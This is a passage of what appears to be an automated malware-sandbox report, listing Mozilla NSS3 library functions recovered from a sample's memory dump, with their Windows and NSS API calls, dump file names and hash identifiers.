                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C489CE8
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D01
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D38
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D4D
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C489D70
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C489DC3
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C489DDD
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488906
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: EnterCriticalSection.KERNEL32(?), ref: 6C48891A
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C48894A
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: calloc.MOZGLUE(00000001,6C49072D,00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488959
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C488993
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: PR_Unlock.NSS3(?), ref: 6C4889AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3394263606-0
                                                                                                                                                                                                                          • Opcode ID: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
                                                                                                                                                                                                                          • Instruction ID: fbdaa9dc08f2a42e21db6212135c4e6454806ce17cf23ab395012322e5b06832
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85515EB0A06B058FDB00EF68C484E5ABBF0BF54359F15852DD8989BB10EB31E884CBD5
                                                                                                                                                                                                                          Function 6C589EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589EC0
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589EF9
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C589F73
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589FA5
                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C589FCF
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C589FF2
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58A01D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1904992153-0
                                                                                                                                                                                                                          • Opcode ID: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
                                                                                                                                                                                                                          • Instruction ID: 9387f445e063be9b56ddade04ef2548801ece252d37e5cc4fe75a0396a33995e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00519EB2801621CBCB109F25DC8064AB7B4BF84319F15856AD8595BB52EB31FC89CBA1
                                                                                                                                                                                                                          Function 6C47DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C47DCFA
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C47DD40
                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DD62
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD71
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47DD81
                                                                                                                                                                                                                          • CERT_RemoveCertListNode.NSS3(?), ref: 6C47DD8F
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD9E
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C47DDB7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 653623313-0
                                                                                                                                                                                                                          • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                          • Instruction ID: 951e07abbb6edc24c6003d1ad8f3015c9ea29b90f8e48e027300086499736b0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91218CB6E011259BEF21DEA4DD40DDEBBB4AF05219B190024E818A7701F722ED158BF2
                                                                                                                                                                                                                          Function 6C505F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F72
                                                                                                                                                                                                                            • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED8F
                                                                                                                                                                                                                            • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED9E
                                                                                                                                                                                                                            • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46EDA4
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F8F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FCC
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FD3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FF4
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FFB
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506019
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506036
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSection$DestroyMonitor$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 227462623-0
                                                                                                                                                                                                                          • Opcode ID: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                          • Instruction ID: 77c2f00d9a5bd523010c8d507d744ad8f6534092b70bc552a68148168edacf50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 392127F1604B019BEA10DF75DC48BD777E8AB41748F10082CE46AC7640EB36F118CB91
                                                                                                                                                                                                                          Function 6C580860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LogFlush.NSS3(00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58086C
                                                                                                                                                                                                                            • Part of subcall function 6C580930: EnterCriticalSection.KERNEL32(?,00000000,?,6C580C83), ref: 6C58094F
                                                                                                                                                                                                                            • Part of subcall function 6C580930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C580C83), ref: 6C580974
                                                                                                                                                                                                                            • Part of subcall function 6C580930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C580983
                                                                                                                                                                                                                            • Part of subcall function 6C580930: _PR_MD_UNLOCK.NSS3(?,?,6C580C83), ref: 6C58099F
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58087D
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C580892
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C58798A), ref: 6C5808AA
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808C7
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808E9
                                                                                                                                                                                                                          • free.MOZGLUE(?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808EF
                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58090E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3145526462-0
                                                                                                                                                                                                                          • Opcode ID: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
                                                                                                                                                                                                                          • Instruction ID: df9ea1bc3f69ee230b87d0edceb9c08c6d1960b21ffcf948cfd7bf5c245d679b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF1181B1B033504BFB00AB54DC5574B3778AB81368F1E0125E41547A40DB31F945CBDE
                                                                                                                                                                                                                          Function 6C473C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,6C4E460B,?,?), ref: 6C473CA9
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C473CB9
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C473CC9
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C473CD6
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C473CE6
                                                                                                                                                                                                                          • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C473CF6
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C473D03
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C473D15
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1376842649-0
                                                                                                                                                                                                                          • Opcode ID: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
                                                                                                                                                                                                                          • Instruction ID: dec37ac7a78f4657409fe128189a0dd0f2ec1b51f5bae679914ffa708447dd8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6112C7AE41514A7EB11A724EC05DE67A38EB0225DF160134ED1843B11F722ED58C7E5
                                                                                                                                                                                                                          Function 6C58B850 Relevance: 12.0, APIs: 8, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B862
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B869
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B88A
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B891
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C58798A), ref: 6C58B8B9
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58B8C0
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E1
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                                                          • Opcode ID: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
                                                                                                                                                                                                                          • Instruction ID: 412f42208b9467f626ac00b7c5358d745b5cfe88545c31a079185b238a5da65b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 411100B2A02B209BDF10EFA0DC0C74A3778BB0A754F464118E51657A40D335BA4ACBDD
                                                                                                                                                                                                                          Function 6C479C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4911C0: PR_NewLock.NSS3 ref: 6C491216
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C479E17
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E25
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E4E
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C479EA2
                                                                                                                                                                                                                            • Part of subcall function 6C489500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C489546
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C479EB6
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C479ED9
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C479F18
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3381623595-0
                                                                                                                                                                                                                          • Opcode ID: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
                                                                                                                                                                                                                          • Instruction ID: d39485737f38312b1e3675c72573b52997b12688e31101f88bb073e1cf0e9f68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1781D3B5A01601ABEB20DF34DC40EEB77A9BF65249F14452CE84987B41FB32E918C7E1
                                                                                                                                                                                                                          Function 6C48DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
